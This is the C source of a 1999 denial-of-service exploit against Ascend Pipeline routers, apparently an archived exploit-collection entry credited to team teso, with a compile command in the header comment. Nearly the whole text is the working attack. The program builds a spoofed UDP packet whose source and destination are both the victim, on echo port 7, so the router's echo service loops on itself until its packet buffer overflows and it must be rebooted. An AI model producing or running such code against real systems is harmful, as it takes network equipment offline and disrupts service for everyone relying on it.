DoS ascend router with simple udp echo<->echo link
3e610f9dc41e66bc8418d2222d57f4c973771ed8591575ffdb3a1eb229546188
/* ascend foo denial of service exploit
* 1999/09/25
*
* basically just another lame echo/echo link, but has nice results on ascend,
* you can increase the lag in steps of 2ms by sending one packet, after some
* few hundret ms lag you overflow the internal packet buffer and the whole
* connection stalls, the router has to be rebooted.
*
* by scut and hendy / team teso [https://teso.scene.at/]
*
* compile with: gcc -o ascend-foo ascend-foo.c -Wall -lnet -DLIBNET_LIL_ENDIAN
* works fine against Ascend Pipeline * modells, haven't tried against others
*/
#include <stdio.h>
#include <libnet.h>
int
main (int argc, char **argv)
{
int sock, c;
u_long src_ip;
u_char *buf;
u_char *qbuf;
int qbuf_s = 0;
printf ("ascend-foo, udp echo dos attack\nby scut / team teso\n\n");
if (argc < 2) {
printf ("usage: %s <srcip> [packetsize]\n\n", argv[0]);
exit (EXIT_FAILURE);
} else if (argc == 2) {
qbuf_s = 73;
} else {
qbuf_s = atoi (argv[2]);
}
qbuf = malloc (qbuf_s);
src_ip = libnet_name_resolve (argv[1], 0);
if (src_ip == 0) {
printf ("invalid syntax\n");
exit (EXIT_FAILURE);
}
buf = calloc (1, (UDP_H + IP_H + qbuf_s));
if (buf == NULL) {
perror ("No memory for packet");
exit (EXIT_FAILURE);
}
libnet_seed_prand ();
sock = libnet_open_raw_sock(IPPROTO_RAW);
if (sock == -1) {
perror ("No socket");
exit (EXIT_FAILURE);
}
libnet_build_ip ( UDP_H + qbuf_s, /* content size */
0, /* tos */
0, /* id */
0, /* frag */
64, /* ttl */
IPPROTO_UDP, /* subprotocol */
src_ip, /* heh ;) */
src_ip,
NULL, /* payload already there */
0, /* same */
buf); /* build in packet buffer */
libnet_build_udp ( 7, /* source port */
7,
qbuf, /* content already there */
qbuf_s, /* same */
buf + IP_H); /* build after ip header */
libnet_do_checksum (buf, IPPROTO_UDP, UDP_H + qbuf_s);
c = libnet_write_ip (sock, buf, UDP_H + IP_H + qbuf_s);
if (c < UDP_H + IP_H + qbuf_s) {
printf ("write_ip wrote too less bytes\n");
}
printf ("completed, wrote %d bytes to victim router\n", c);
free (buf);
return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}